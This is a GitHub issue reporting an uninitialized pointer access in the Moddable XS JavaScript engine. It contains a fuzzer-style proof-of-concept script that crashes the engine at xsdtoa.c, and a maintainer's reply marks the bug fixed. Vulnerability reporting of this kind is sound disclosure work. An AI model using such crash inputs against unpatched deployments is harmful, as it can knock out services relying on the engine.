Moddable-OpenSource/moddable #374: Access of Uninitialized Pointer

rain6851, 2020-06-02:
# Enviroment
```
operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function main() {
    const v7 = [
        3.37,
        13.37,
        13.37,
        13.37,
        13.37
    ];
    var zFzK = new Object();
    var GnmP = new String();
    var zjbK = Error;
    var EGpp = new Int8Array([
        v7,
        v7,
        v7,
        v7,
        v7
    ]);
    var nKhN = main();
    const v8 = [];
    var eSDF = null != null;
    let v9 = v8;
    function v10(v11, v12) {
        function v14(v15, v16, v17, v18, v19) {
            const v21 = [Map];
            var Jbaa = Reflect;
            var keps = main();
            var pHBa = Math;
            v9 = JSON.stringify('');
            var rjSX = Math;
            const v22 = new Map(v21);
            var ekAS = v14(function () {
            }, null, null, null, null);
            const v25 = [
                13.37,
                13.37
            ];
            var DcKp = v10(null, v57, v21.length, v57.length, v25.length);
            var hdjS = v10(null, null, null, null, null);
            let v28 = 0;
            while (v28 < 8) {
                v57[0] = -4147350375;
                const v29 = v28 + 1;
                var zkQQ = Proxy;
                v25.length = main();
                var aZzR = Error;
                var yDzK = v10(null, null, null, null, null);
                var jhxY = JSON.stringify('Ve4[1gZ[/hi#+I/TPI!lSlw`');
                v14(function () {
                }, null, null, null, null);
                v57.length = v29;
                JSON.stringify('D*;bzow,?!e(3~4');
                JSON.parse('16%a');
                var abdR = v14(function () {
                }, null, null, null, v25.length);
                var AByQ = v10(null, null, null, null, null);
                var krrF = v14(function () {
                }, null, null, null, null);
            }
            for (let v33 = 0; v33 < 6; v33++) {
                const v35 = [
                    13.37,
                    13.37,
                    13.37,
                    13.37,
                    13.37
                ];
                var KPKe = Reflect;
                var TYXs = new String();
                const v37 = [];
                const v38 = new Map(v37);
                const v39 = {
                    a: v35,
                    valueOf: v35,
                    __proto__: 13.37
                };
                const v41 = v38.forEach(Symbol, v39);
                const v42 = v22.has(v33);
            }
        }
        for (let v46 = 0; v46 < 100; v46++) {
            const v47 = v14(v14);
        }
        let v49 = 0;
        const v55 = v49 + 1;
        v9.length = v55;
    }
    const v56 = [];
    let v57 = v56;
    const v58 = v10(...v57, v9, ...v7, 10, 13.37);
}
main();
```
# vulnerability analysis
```
crash position:  xs/sources/xsdtoa.c:1690
```
We can see that the value of register ds is 0, but it does use it as an address to access the exception.

[image]

[image]

The abnormal call stack is as follows：

[image]

rain6851, 2020-06-02:
@phoddie @mkellner @Moddable-OpenSource please check the issue

phoddie, 2020-08-04:
Fixed. Related to #376.

closed 2020-08-04 by phoddie